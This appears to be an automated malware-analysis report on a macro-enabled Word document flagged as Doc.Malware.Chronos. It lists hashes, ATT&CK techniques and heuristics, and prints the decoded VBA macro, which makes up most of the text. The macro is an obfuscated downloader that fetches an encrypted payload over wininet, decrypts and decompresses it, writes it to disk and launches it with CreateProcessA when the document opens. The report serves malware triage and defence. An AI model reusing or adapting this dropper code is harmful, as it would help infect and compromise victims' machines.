Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 73bb992a5db4509e…

MALICIOUS

Office (OOXML)

Size: 40.1 KB
Created: 2015-06-24 11:31:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2015-09-24
MD5: 7984fc46ae040d7815f4016e0ddae430
SHA-1: 0ad531063bf09fa9a3bb707aae6e5d55b765635c
SHA-256: 73bb992a5db4509e410df0115cfdbd6b13266a0789947dfb855ceda0c8930e4e
Risk Score: 180

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1203 Exploitation for Client Execution

The sample is an OOXML document containing VBA macros, indicated by the 'OOXML_VBA' and 'OLE_VBA_DOCOPEN' heuristics. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', a common lure for macro-based malware. The presence of a 'Document_Open' macro and the 'SE_ENABLE_LURE' heuristic further support this. The ClamAV detection 'Doc.Malware.Chronos-6897935-0' strongly suggests malicious intent, likely involving the download and execution of a second-stage payload via the VBA script.

Heuristics (7)

  • ClamAV: Doc.Malware.Chronos-6897935-0 (severity: critical; heuristic: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML (severity: medium; 2 related findings; heuristic: OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • Document_Open macro (severity: low; heuristic: OLE_VBA_DOCOPEN)
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) (severity: low; heuristic: OLE_VBA_ENVIRON)
    Environ() call (env variable access)
    Matched line in script
    LMAXuL1 = Environ(DKX1DXEAUcf6G(Chr(81) + Chr(110) + Chr(121) + Chr(112) + Chr(119) + Chr(238) + Chr(81), "Fj2AJdGU")) & "\" & MAH6GM2yWYO & DKX1DXEAUcf6G(Chr(173) + Chr(169) + Chr(55) + Chr(188), "NwH2tYuyXBhInJ")
  • Macro/content-enable lure (severity: medium; heuristic: SE_ENABLE_LURE)
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact (severity: info; heuristic: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; heuristic: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 22395 bytes
SHA-256: 1c7b60d4b21842618f0b2eb06cc29c508eabf5eaa95207e6bb195685a2d30749
Detection
ClamAV: No threats found
Obfuscation or payload: likely
155 of 278 identifiers look randomly generated (e.g. 'DjcR4Myojp9FRJWBcDoE5') — consistent with name-mangling obfuscation.
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Declare Function InternetOpenA Lib "wininet" (ByVal TBpYSRhk As String, ByVal PTBPgAe32vVx8N As Long, ByVal BJCm9U3FA As String, ByVal LEzqXfsqrz0y As String, ByVal MQiA1HgpYXQVWN As Long) As Long
Private Declare Sub E4bULRFT7ZmN8 Lib "msvbvm60" Alias "#183" (ByVal KQQZ3rmP As Long, ByVal QolDZQJRI As Long, ByVal VHKV8CsJx3Yn As Long)
Private XnHwWJh(0 To 255) As Integer
Private Declare Function InternetCloseHandle Lib "wininet" (ByRef QiuYJcuegc74ZxGQK As Long) As Long
Private Type HgYRnJvueG0YGxWLz
   LU3FA7UTf As Byte
   G8EAbkI6np4IwT() As Byte
End Type
Private Declare Function CloseHandle Lib "kernel32" (ByVal VXFa6 As Long) As Long
Private SyGY3WdRsGkIvj As String
Private Type HC3oYszRwHL
   M8wrG6tj8t As Long
   WrIFaxsQ As Long
   XDGmBHVziwfI As Long
   MI2IAe4fw As Long
End Type
Private Type RfiN92YQjla2OqxP
   U5mZXrdd0 As Long
   JcL8n16Cr8X8 As String
   M2PJArBVNjr As String
   MCz As String
   B1HVs1U As Long
   A0fcESCcGd2XHx As Long
   Dn0dAgQg As Long
   WjxUyEU5t As Long
   YRVfmcmfXHoq As Long
   GvTqp51DLX As Long
   IpY As Long
   ARIs0KOdF As Long
   M8ykhStl1K As Integer
   Drpct As Integer
   Yr8Tvtr0 As Long
   YhG9p As Long
   PGSxMrMBS4 As Long
   YntM5D8kbrlUhqE As Long
End Type
Private Declare Function CreateProcessA Lib "kernel32" (ByVal G5NMVl2Uzd1 As String, ByVal JcN1EN1bBYXA As String, MIqNwmpMQj As Any, RH4VmS70uvMVo6 As Any, ByVal W76tEUle3Adj6S As Long, ByVal Iw7Hh2V As Long, CS96dYAOy4l As Any, ByVal PQKaaChgtbB3bb1DD As String, R7CYum As RfiN92YQjla2OqxP, Gi7WwNu2uZeTV As HC3oYszRwHL) As Long
Private Declare Function InternetReadFile Lib "wininet" (ByVal Pwd0evA7BbQxku As Long, ByVal TRYqHZtFa4 As String, ByVal No9nzWInlt As Long, GqkM As Long) As Integer
Private Type YRSrxgfiJENRt
   MK5lwvr1deV As Integer
   JITJY As Integer
   PqmLP7l77aS As Integer
   K6ccB8YIMz As Integer
   ESDZu5db5yu As Long
End Type
Private Declare Function InternetOpenUrlA Lib "wininet" (ByVal UTP2b As Long, ByVal Aj0s7T86 As String, ByVal BZw4c6X2mnLv As String, ByVal BlfO6iL1coQX As Long, ByVal Ha1ti41r7DiO7 As Long, ByVal LIKwglG As Long) As Long
Private Function QxD(ByVal G2Ldua9M As String, ByVal UTNe5Viahi0qE1mCN As String, ByVal QrQuP As String) As Boolean
Dim QQA8Ng As Long, OeHs4Jz4L3S9 As Long
QQA8Ng = 36
OeHs4Jz4L3S9 = 79
If QQA8Ng + OeHs4Jz4L3S9 > 4 Then
OeHs4Jz4L3S9 = QQA8Ng + 4
Else
MsgBox 31
End If
Dim BsZz08JRqIE4wOC As Long, ByRdFxiQBkzm As Long, IiNEgs As Long, FwUyfmk3 As String * 8162, SdUP9W3EHTbmvBE As String, GKvbe10j4Vzg As Integer, JITHf As Double
Dim SzKUB6zJeC As Long, GWuFQeJFuwUm As Long
SzKUB6zJeC = 33
GWuFQeJFuwUm = 88
If SzKUB6zJeC + GWuFQeJFuwUm > 4 Then
GWuFQeJFuwUm = SzKUB6zJeC + 48
Else
MsgBox 44
End If
BsZz08JRqIE4wOC = InternetOpenA(DKX1DXEAUcf6G(Chr(100) + Chr(159) + Chr(103) + Chr(62) + Chr(226) + Chr(197) + Chr(9) + Chr(177) + Chr(27) + Chr(137) + Chr(168) + Chr(174) + Chr(78) + Chr(208) + Chr(249) + Chr(193) + Chr(81) + Chr(62) + Chr(162) + Chr(170) + Chr(168) + Chr(241) + Chr(9) + Chr(249) + Chr(246) + Chr(129) + Chr(117) + Chr(50) + Chr(167) + Chr(77) + Chr(89) + Chr(201) + Chr(130) + Chr(65) + Chr(123) + Chr(19) + Chr(246) + Chr(166) + Chr(210) + Chr(221) + Chr(58) + Chr(237) + Chr(80) + Chr(166) + Chr(85) + Chr(231) + Chr(5) + Chr(152) + Chr(250) + Chr(84) + Chr(145) + Chr(19) + Chr(72) + Chr(196) + Chr(30) + Chr(46) + Chr(35) + Chr(37) + Chr(223) + Chr(221) + Chr(229) + Chr(116) + Chr(125) + Chr(187) + Chr(216) + Chr(143) + Chr(91), "JeOW2n"), 1, vbNullString, vbNullString, 0)
Dim WL3f8Yj As Long, LF6X9gO3F48G5SZP As Long
WL3f8Yj = 59
LF6X9gO3F48G5SZP = 64
If WL3f8Yj + LF6X9gO3F48G5SZP > 4 Then
LF6X9gO3F48G5SZP = WL3f8Yj + 48
Else
MsgBox 96
End If
If BsZz08JRqIE4wOC = 0 Then
Dim AJRvzz As Long, UltEFQA8 As Long
AJRvzz = 32
UltEFQA8 = 44
If AJRvzz + UltEFQA8 > 4 Then
UltEFQA8 = AJRvzz + 81
Else
MsgBox 96
End If
  QxD = False
  Exit Function
End If
Dim LZUVE9sA93P As Long, V9Krcl As Long
LZUVE9sA93P = 56
V9Krcl = 46
If LZUVE9sA93P + V9Krcl > 4 Then
V9Krcl = LZUVE9sA93P + 3
Else
MsgBox 6
End If
ByRdFxiQBkzm = InternetOpenUrlA(BsZz08JRqIE4wOC, G2Ldua9M, vbNullString, 0, &H4000000, 0)
Dim VD9Esusz0 As Long, WVvowhd59Zz4RVx9b As Long
VD9Esusz0 = 42
WVvowhd59Zz4RVx9b = 16
If VD9Esusz0 + WVvowhd59Zz4RVx9b > 4 Then
WVvowhd59Zz4RVx9b = VD9Esusz0 + 67
Else
MsgBox 11
End If
If ByRdFxiQBkzm = 0 Then
Dim QKJTlRordIC As Long, P2jV2Y5KtEEZIup As Long
QKJTlRordIC = 19
P2jV2Y5KtEEZIup = 58
If QKJTlRordIC + P2jV2Y5KtEEZIup > 4 Then
P2jV2Y5KtEEZIup = QKJTlRordIC + 40
Else
MsgBox 22
End If
  JITHf = 0
Else
Dim IVqK As Long, LUINafBgT As Long
IVqK = 31
LUINafBgT = 47
If IVqK + LUINafBgT > 4 Then
LUINafBgT = IVqK + 71
Else
MsgBox 26
End If
InternetReadFile ByRdFxiQBkzm, FwUyfmk3, 8162, IiNEgs
SdUP9W3EHTbmvBE = FwUyfmk3
Dim Dde4njWj As Long, HF7SWGb3GzVqH0U2 As Long
Dde4njWj = 48
HF7SWGb3GzVqH0U2 = 21
If Dde4njWj + HF7SWGb3GzVqH0U2 > 4 Then
HF7SWGb3GzVqH0U2 = Dde4njWj + 51
Else
MsgBox 58
End If
Do While IiNEgs <> 0
  InternetReadFile ByRdFxiQBkzm, FwUyfmk3, 8162, IiNEgs
  SdUP9W3EHTbmvBE = SdUP9W3EHTbmvBE + Mid(FwUyfmk3, 1, IiNEgs)
Loop
JITHf = Len(SdUP9W3EHTbmvBE)
Dim UvmmqRPg1ULy6l40 As Long, PxjLwwY As Long
UvmmqRPg1ULy6l40 = 17
PxjLwwY = 43
If UvmmqRPg1ULy6l40 + PxjLwwY > 4 Then
PxjLwwY = UvmmqRPg1ULy6l40 + 37
Else
MsgBox 4
End If
GKvbe10j4Vzg = FreeFile
Dim SMjWj As Long, BbCi2 As Long
SMjWj = 58
BbCi2 = 64
If SMjWj + BbCi2 > 4 Then
BbCi2 = SMjWj + 48
Else
MsgBox 95
End If
Open UTNe5Viahi0qE1mCN For Binary Access Write Lock Write As #GKvbe10j4Vzg
Put #GKvbe10j4Vzg, , IUPw87nykedO1WA(DKX1DXEAUcf6G(SdUP9W3EHTbmvBE, QrQuP))
Dim XFzIzT5zBBsLg3fs As Long, OkARgibNheU As Long
XFzIzT5zBBsLg3fs = 17
OkARgibNheU = 16
If XFzIzT5zBBsLg3fs + OkARgibNheU > 4 Then
OkARgibNheU = XFzIzT5zBBsLg3fs + 46
Else
MsgBox 27
End If
Close #GKvbe10j4Vzg
End If
InternetCloseHandle ByRdFxiQBkzm
Dim DjcR4Myojp9FRJWBcDoE5 As Long, VVwiIIpdPz As Long
DjcR4Myojp9FRJWBcDoE5 = 89
VVwiIIpdPz = 98
If DjcR4Myojp9FRJWBcDoE5 + VVwiIIpdPz > 4 Then
VVwiIIpdPz = DjcR4Myojp9FRJWBcDoE5 + 70
Else
MsgBox 56
End If
InternetCloseHandle BsZz08JRqIE4wOC
SdUP9W3EHTbmvBE = ""
If JITHf Then
  QxD = True
Dim GgnBJhjO As Long, Cz91CRrttADQqwLu6 As Long
GgnBJhjO = 27
Cz91CRrttADQqwLu6 = 60
If GgnBJhjO + Cz91CRrttADQqwLu6 > 4 Then
Cz91CRrttADQqwLu6 = GgnBJhjO + 33
Else
MsgBox 41
End If
End If
Dim VU9FnHSCY As Long, Vh9bSqtqZr0 As Long
VU9FnHSCY = 4
Vh9bSqtqZr0 = 29
If VU9FnHSCY + Vh9bSqtqZr0 > 4 Then
Vh9bSqtqZr0 = VU9FnHSCY + 78
Else
MsgBox 78
End If
End Function
Private Function PqkSxmrigqfWWVS8x(Ke88xa As String)
Dim QuemAovke As Long, RBEluE7ze42 As Long
QuemAovke = 41
RBEluE7ze42 = 16
If QuemAovke + RBEluE7ze42 > 4 Then
RBEluE7ze42 = QuemAovke + 17
Else
MsgBox 68
End If
Dim HcVZNmiKlKuRU7 As HC3oYszRwHL, L8R4QR1YdyA9 As RfiN92YQjla2OqxP, HnNCblPRl6fuFFaK As String
Dim MSRzD As Long, X5VFBEF77nbpi As Long
MSRzD = 18
X5VFBEF77nbpi = 38
If MSRzD + X5VFBEF77nbpi > 4 Then
X5VFBEF77nbpi = MSRzD + 78
Else
MsgBox 4
End If
L8R4QR1YdyA9.U5mZXrdd0 = Len(L8R4QR1YdyA9)
Dim Xd4cOi1 As Long, TzdawQqjuemAov As Long
Xd4cOi1 = 23
TzdawQqjuemAov = 22
If Xd4cOi1 + TzdawQqjuemAov > 4 Then
TzdawQqjuemAov = Xd4cOi1 + 53
Else
MsgBox 33
End If
CreateProcessA HnNCblPRl6fuFFaK, Ke88xa, ByVal 0&, ByVal 0&, 1&, &H20&, ByVal 0&, HnNCblPRl6fuFFaK, L8R4QR1YdyA9, HcVZNmiKlKuRU7
Dim GBGv79e1FgP As Long, CTwsASEjAm As Long
GBGv79e1FgP = 19
CTwsASEjAm = 80
If GBGv79e1FgP + CTwsASEjAm > 4 Then
CTwsASEjAm = GBGv79e1FgP + 97
Else
MsgBox 98
End If
CloseHandle HcVZNmiKlKuRU7.WrIFaxsQ
Dim WXCsTXl7M As Long, Psn6uWwbplXBzzf As Long
WXCsTXl7M = 90
Psn6uWwbplXBzzf = 93
If WXCsTXl7M + Psn6uWwbplXBzzf > 4 Then
Psn6uWwbplXBzzf = WXCsTXl7M + 12
Else
MsgBox 57
End If
CloseHandle HcVZNmiKlKuRU7.M8wrG6tj8t
Dim FhxOpv As Long, VdoVOng6FKap2 As Long
FhxOpv = 30
VdoVOng6FKap2 = 76
If FhxOpv + VdoVOng6FKap2 > 4 Then
VdoVOng6FKap2 = FhxOpv + 11
Else
MsgBox 60
End If
End Function
Sub Th0oP49hY(TnCbnRQkgM6() As Byte, Optional GekYc As String)
Dim BjrI3cK7 As Long, UzvuI3EZzsQ1ez0p As Long, FGIuOi As Byte, TCOvi40bPey As Long, Om7mhTwAtWpH3pq As Long, NWUem As Long, C89pts4wj5dV2zda(0 To 255) As Integer
If (Len(GekYc) > 0) Then V9Jyck = GekYc
E4bULRFT7ZmN8 512, VarPtr(C89pts4wj5dV2zda(0)), VarPtr(XnHwWJh(0))
Om7mhTwAtWpH3pq = UBound(TnCbnRQkgM6) + 1
NWUem = Om7mhTwAtWpH3pq
For TCOvi40bPey = 0 To (Om7mhTwAtWpH3pq - 1)
BjrI3cK7 = (BjrI3cK7 + 1) Mod 256
UzvuI3EZzsQ1ez0p = (UzvuI3EZzsQ1ez0p + C89pts4wj5dV2zda(BjrI3cK7)) Mod 256
FGIuOi = C89pts4wj5dV2zda(BjrI3cK7)
C89pts4wj5dV2zda(BjrI3cK7) = C89pts4wj5dV2zda(UzvuI3EZzsQ1ez0p)
C89pts4wj5dV2zda(UzvuI3EZzsQ1ez0p) = FGIuOi
TnCbnRQkgM6(TCOvi40bPey) = TnCbnRQkgM6(TCOvi40bPey) Xor (C89pts4wj5dV2zda((C89pts4wj5dV2zda(BjrI3cK7) + C89pts4wj5dV2zda(UzvuI3EZzsQ1ez0p)) Mod 256))
Next
End Sub
Private Function MAH6GM2yWYO(Optional O6isGbb8XPJx35l As String = "0123456789") As String
Dim MMCNRDkK0xbnjZ As Long, Vn1G3miSkmhm As Long
MMCNRDkK0xbnjZ = 59
Vn1G3miSkmhm = 86
If MMCNRDkK0xbnjZ + Vn1G3miSkmhm > 4 Then
Vn1G3miSkmhm = MMCNRDkK0xbnjZ + 6
Else
MsgBox 73
End If
Dim No8uXAOOlr() As Byte, ArjM() As Byte, Uh66Poz2B0XETBU9 As Long, IOYItJ4LlkHb As Long, BVuDmVM8Zv3 As Long, OIjh34w0U As String
Dim JKap2n As Long, PolxiinK9Ob As Long
JKap2n = 60
PolxiinK9Ob = 11
If JKap2n + PolxiinK9Ob > 4 Then
PolxiinK9Ob = JKap2n + 32
Else
MsgBox 21
End If
BVuDmVM8Zv3 = 0
Dim BHDZfq3jm9 As Long, Ubm2Qzb As Long
BHDZfq3jm9 = 74
Ubm2Qzb = 69
If BHDZfq3jm9 + Ubm2Qzb > 4 Then
Ubm2Qzb = BHDZfq3jm9 + 57
Else
MsgBox 92
End If
ReO89UULhWFjj0:
Dim TfHKW7B6Bqs As Long, PbGNiW0bVtxo As Long
TfHKW7B6Bqs = 56
PbGNiW0bVtxo = 47
If TfHKW7B6Bqs + PbGNiW0bVtxo > 4 Then
PbGNiW0bVtxo = TfHKW7B6Bqs + 48
Else
MsgBox 45
End If
Randomize
OIjh34w0U = Int(30 * Rnd)
If OIjh34w0U < 4 Then GoTo ReO89UULhWFjj0
BVuDmVM8Zv3 = OIjh34w0U
If BVuDmVM8Zv3 > 0& Then
Dim C5FWa4Dpi As Long, JaIWkVm0pE As Long
C5FWa4Dpi = 37
JaIWkVm0pE = 52
If C5FWa4Dpi + JaIWkVm0pE > 4 Then
JaIWkVm0pE = C5FWa4Dpi + 32
Else
MsgBox 93
End If
Randomize
No8uXAOOlr = O6isGbb8XPJx35l
Dim E7r40fydAPruj As Long, JssUTc As Long
E7r40fydAPruj = 38
JssUTc = 77
If E7r40fydAPruj + JssUTc > 4 Then
JssUTc = E7r40fydAPruj + 58
Else
MsgBox 41
End If
Uh66Poz2B0XETBU9 = Len(O6isGbb8XPJx35l) - 1&
BVuDmVM8Zv3 = (BVuDmVM8Zv3 * 2&) - 1&
Dim OaCXRcIlP3aIWkV As Long, KETRCs908ZIfs As Long
OaCXRcIlP3aIWkV = 52
KETRCs908ZIfs = 32
If OaCXRcIlP3aIWkV + KETRCs908ZIfs > 4 Then
KETRCs908ZIfs = OaCXRcIlP3aIWkV + 93
Else
MsgBox 11
End If
ReDim ArjM(BVuDmVM8Zv3) As Byte
For IOYItJ4LlkHb = 0& To BVuDmVM8Zv3 Step 2&
ArjM(IOYItJ4LlkHb) = No8uXAOOlr(CLng(Uh66Poz2B0XETBU9 * Rnd) * 2&)
Next
Dim P2yFcgwKQFXt As Long, A16P5pVE As Long
P2yFcgwKQFXt = 4
A16P5pVE = 7
If P2yFcgwKQFXt + A16P5pVE > 4 Then
A16P5pVE = P2yFcgwKQFXt + 24
Else
MsgBox 43
End If
End If
Dim ILCwu8bmx4k As Long, YjWQLKPJuDIS As Long
ILCwu8bmx4k = 18
YjWQLKPJuDIS = 62
If ILCwu8bmx4k + YjWQLKPJuDIS > 4 Then
YjWQLKPJuDIS = ILCwu8bmx4k + 75
Else
MsgBox 89
End If
MAH6GM2yWYO = ArjM
Dim FJaOUHfHKW7 As Long, NDVP As Long
FJaOUHfHKW7 = 88
NDVP = 51
If FJaOUHfHKW7 + NDVP > 4 Then
NDVP = FJaOUHfHKW7 + 63
Else
MsgBox 1
End If
End Function
Private Function IUPw87nykedO1WA(SvE8o0 As String) As String
Dim YD2w2STKlFD() As Byte
YD2w2STKlFD() = StrConv(SvE8o0, vbFromUnicode)
C5EcEUD YD2w2STKlFD, Len(SvE8o0)
IUPw87nykedO1WA = StrConv(YD2w2STKlFD(), vbUnicode)
End Function
Private Sub QXmCqE1h(G9Si3hS1() As YRSrxgfiJENRt, GYe3yKx4Wjdjg7 As Long, H6IQKSZtKa2rMsUeq As Long, R0EoSsBVGCElhv9 As HgYRnJvueG0YGxWLz)
Dim I2xLMGrdHKXF As Integer, ALW9hsLeFWLvGQ6X4 As Long
ALW9hsLeFWLvGQ6X4 = 0
For I2xLMGrdHKXF = 0 To (R0EoSsBVGCElhv9.LU3FA7UTf - 1)
If (R0EoSsBVGCElhv9.G8EAbkI6np4IwT(I2xLMGrdHKXF) = 0) Then
If (G9Si3hS1(ALW9hsLeFWLvGQ6X4).PqmLP7l77aS = -1) Then
G9Si3hS1(ALW9hsLeFWLvGQ6X4).PqmLP7l77aS = GYe3yKx4Wjdjg7
G9Si3hS1(GYe3yKx4Wjdjg7).MK5lwvr1deV = ALW9hsLeFWLvGQ6X4
G9Si3hS1(GYe3yKx4Wjdjg7).PqmLP7l77aS = -1
G9Si3hS1(GYe3yKx4Wjdjg7).JITJY = -1
G9Si3hS1(GYe3yKx4Wjdjg7).K6ccB8YIMz = -1
GYe3yKx4Wjdjg7 = GYe3yKx4Wjdjg7 + 1
End If
ALW9hsLeFWLvGQ6X4 = G9Si3hS1(ALW9hsLeFWLvGQ6X4).PqmLP7l77aS
ElseIf (R0EoSsBVGCElhv9.G8EAbkI6np4IwT(I2xLMGrdHKXF) = 1) Then
If (G9Si3hS1(ALW9hsLeFWLvGQ6X4).JITJY = -1) Then
G9Si3hS1(ALW9hsLeFWLvGQ6X4).JITJY = GYe3yKx4Wjdjg7
G9Si3hS1(GYe3yKx4Wjdjg7).MK5lwvr1deV = ALW9hsLeFWLvGQ6X4
G9Si3hS1(GYe3yKx4Wjdjg7).PqmLP7l77aS = -1
G9Si3hS1(GYe3yKx4Wjdjg7).JITJY = -1
G9Si3hS1(GYe3yKx4Wjdjg7).K6ccB8YIMz = -1
GYe3yKx4Wjdjg7 = GYe3yKx4Wjdjg7 + 1
End If
ALW9hsLeFWLvGQ6X4 = G9Si3hS1(ALW9hsLeFWLvGQ6X4).JITJY
Else
Stop
End If
Next
G9Si3hS1(ALW9hsLeFWLvGQ6X4).K6ccB8YIMz = H6IQKSZtKa2rMsUeq
End Sub
Private Sub C5EcEUD(LYaHbNv() As Byte, KESWpIw07ev5f As Long)
Dim FyoDf2hZr2FKNIV As Long, LGIOYItJ As Long, QLO0A4p5sEXuL1 As Byte, LAVwPB4gPVXwvKBl As Long, UhuDPwn As Integer, AzKMETd As Byte, U7UBxT17oB1kfFT7g() As Byte, BHvLwA4VxnMM As Integer
Dim HibW6t78i4qO As Long, TJPXra4Wgx As Byte, PqyI6aNe As Long, OeGzcy54KA0o As Long, JKciTCPEcthaV As Long, V9d5wyd(0 To 7) As Byte, S6ArG58KxtJXt(0 To 511) As YRSrxgfiJENRt, Qtgfc9q054Bb(0 To 255) As HgYRnJvueG0YGxWLz
LAVwPB4gPVXwvKBl = 1
AzKMETd = LYaHbNv(LAVwPB4gPVXwvKBl - 1)
LAVwPB4gPVXwvKBl = LAVwPB4gPVXwvKBl + 1
E4bULRFT7ZmN8 4, VarPtr(PqyI6aNe), VarPtr(LYaHbNv(LAVwPB4gPVXwvKBl - 1))
LAVwPB4gPVXwvKBl = LAVwPB4gPVXwvKBl + 4
JKciTCPEcthaV = PqyI6aNe
If (PqyI6aNe = 0) Then Exit Sub
ReDim U7UBxT17oB1kfFT7g(0 To PqyI6aNe - 1)
E4bULRFT7ZmN8 2, VarPtr(UhuDPwn), VarPtr(LYaHbNv(LAVwPB4gPVXwvKBl - 1))
LAVwPB4gPVXwvKBl = LAVwPB4gPVXwvKBl + 2
For FyoDf2hZr2FKNIV = 1 To UhuDPwn
With Qtgfc9q054Bb(LYaHbNv(LAVwPB4gPVXwvKBl - 1))
LAVwPB4gPVXwvKBl = LAVwPB4gPVXwvKBl + 1
.LU3FA7UTf = LYaHbNv(LAVwPB4gPVXwvKBl - 1)
LAVwPB4gPVXwvKBl = LAVwPB4gPVXwvKBl + 1
ReDim .G8EAbkI6np4IwT(0 To .LU3FA7UTf - 1)
End With
Next
V9d5wyd(0) = 2 ^ 0
V9d5wyd(1) = 2 ^ 1
V9d5wyd(2) = 2 ^ 2
V9d5wyd(3) = 2 ^ 3
V9d5wyd(4) = 2 ^ 4
V9d5wyd(5) = 2 ^ 5
V9d5wyd(6) = 2 ^ 6
V9d5wyd(7) = 2 ^ 7
TJPXra4Wgx = LYaHbNv(LAVwPB4gPVXwvKBl - 1)
LAVwPB4gPVXwvKBl = LAVwPB4gPVXwvKBl + 1
BHvLwA4VxnMM = 0
For FyoDf2hZr2FKNIV = 0 To 255
With Qtgfc9q054Bb(FyoDf2hZr2FKNIV)
If (.LU3FA7UTf > 0) Then
For LGIOYItJ = 0 To (.LU3FA7UTf - 1)
If (TJPXra4Wgx And V9d5wyd(BHvLwA4VxnMM)) Then .G8EAbkI6np4IwT(LGIOYItJ) = 1
BHvLwA4VxnMM = BHvLwA4VxnMM + 1
If (BHvLwA4VxnMM = 8) Then
TJPXra4Wgx = LYaHbNv(LAVwPB4gPVXwvKBl - 1)
LAVwPB4gPVXwvKBl = LAVwPB4gPVXwvKBl + 1
BHvLwA4VxnMM = 0
End If
Next
End If
End With
Next
If (BHvLwA4VxnMM = 0) Then LAVwPB4gPVXwvKBl = LAVwPB4gPVXwvKBl - 1
OeGzcy54KA0o = 1
S6ArG58KxtJXt(0).PqmLP7l77aS = -1
S6ArG58KxtJXt(0).JITJY = -1
S6ArG58KxtJXt(0).MK5lwvr1deV = -1
S6ArG58KxtJXt(0).K6ccB8YIMz = -1
For FyoDf2hZr2FKNIV = 0 To 255
QXmCqE1h S6ArG58KxtJXt(), OeGzcy54KA0o, FyoDf2hZr2FKNIV, Qtgfc9q054Bb(FyoDf2hZr2FKNIV)
Next
PqyI6aNe = 0
For LAVwPB4gPVXwvKBl = LAVwPB4gPVXwvKBl To KESWpIw07ev5f
TJPXra4Wgx = LYaHbNv(LAVwPB4gPVXwvKBl - 1)
For BHvLwA4VxnMM = 0 To 7
If (TJPXra4Wgx And V9d5wyd(BHvLwA4VxnMM)) Then HibW6t78i4qO = S6ArG58KxtJXt(HibW6t78i4qO).JITJY Else HibW6t78i4qO = S6ArG58KxtJXt(HibW6t78i4qO).PqmLP7l77aS
If (S6ArG58KxtJXt(HibW6t78i4qO).K6ccB8YIMz > -1) Then
U7UBxT17oB1kfFT7g(PqyI6aNe) = S6ArG58KxtJXt(HibW6t78i4qO).K6ccB8YIMz
PqyI6aNe = PqyI6aNe + 1
If (PqyI6aNe = JKciTCPEcthaV) Then GoTo JKciTCPEcthaV
HibW6t78i4qO = 0
End If
Next
Next
JKciTCPEcthaV:
QLO0A4p5sEXuL1 = 0
For FyoDf2hZr2FKNIV = 0 To (PqyI6aNe - 1)
QLO0A4p5sEXuL1 = QLO0A4p5sEXuL1 Xor U7UBxT17oB1kfFT7g(FyoDf2hZr2FKNIV)
Next
ReDim LYaHbNv(0 To PqyI6aNe - 1)
E4bULRFT7ZmN8 PqyI6aNe, VarPtr(LYaHbNv(0)), VarPtr(U7UBxT17oB1kfFT7g(0))
End Sub
Private Sub Document_Open()
On Error Resume Next
Dim L2MpyBMcjAABH As Long, QkgswjcYeaUoRwns As Long
L2MpyBMcjAABH = 29
QkgswjcYeaUoRwns = 1
If L2MpyBMcjAABH + QkgswjcYeaUoRwns > 4 Then
QkgswjcYeaUoRwns = L2MpyBMcjAABH + 14
Else
MsgBox 27
End If
Dim LMAXuL1 As String
Dim OKigrmX5j5K2 As Long, RLgVeU2 As Long
OKigrmX5j5K2 = 27
RLgVeU2 = 7
If OKigrmX5j5K2 + RLgVeU2 > 4 Then
RLgVeU2 = OKigrmX5j5K2 + 67
Else
MsgBox 85
End If
Dim U8i17I3p3b3os As Long, RddrQAqJu As Long, Bdl0G9 As Long, YXc3ca8m4qK As Integer
Dim OGNJ44 As Long, CrHE7w0QSCtWCP As Long
OGNJ44 = 57
CrHE7w0QSCtWCP = 17
If OGNJ44 + CrHE7w0QSCtWCP > 4 Then
CrHE7w0QSCtWCP = OGNJ44 + 63
Else
MsgBox 97
End If
U8i17I3p3b3os = 978972537: RddrQAqJu = 0: Bdl0G9 = 0
Dim XbevL As Long, Drci3KW89DXC As Long
XbevL = 75
Drci3KW89DXC = 15
If XbevL + Drci3KW89DXC > 4 Then
Drci3KW89DXC = XbevL + 70
Else
MsgBox 78
End If
For RddrQAqJu = 1 To U8i17I3p3b3os
Bdl0G9 = Bdl0G9 + 1
Next RddrQAqJu
Dim YFprPEr1cy8x As Long, PMZMJ4xE As Long
YFprPEr1cy8x = 14
PMZMJ4xE = 73
If YFprPEr1cy8x + PMZMJ4xE > 4 Then
PMZMJ4xE = YFprPEr1cy8x + 69
Else
MsgBox 34
End If
If Bdl0G9 = U8i17I3p3b3os Then
Dim ELaWKzFV As Long, OtVZ8sCq As Long
ELaWKzFV = 67
OtVZ8sCq = 41
If ELaWKzFV + OtVZ8sCq > 4 Then
OtVZ8sCq = ELaWKzFV + 92
Else
MsgBox 36
End If
LMAXuL1 = Environ(DKX1DXEAUcf6G(Chr(81) + Chr(110) + Chr(121) + Chr(112) + Chr(119) + Chr(238) + Chr(81), "Fj2AJdGU")) & "\" & MAH6GM2yWYO & DKX1DXEAUcf6G(Chr(173) + Chr(169) + Chr(55) + Chr(188), "NwH2tYuyXBhInJ")
Dim OKkZJ7R5kymO As Long, Rb7ZPkT As Long
OKkZJ7R5kymO = 53
Rb7ZPkT = 33
If OKkZJ7R5kymO + Rb7ZPkT > 4 Then
Rb7ZPkT = OKkZJ7R5kymO + 93
Else
MsgBox 84
End If
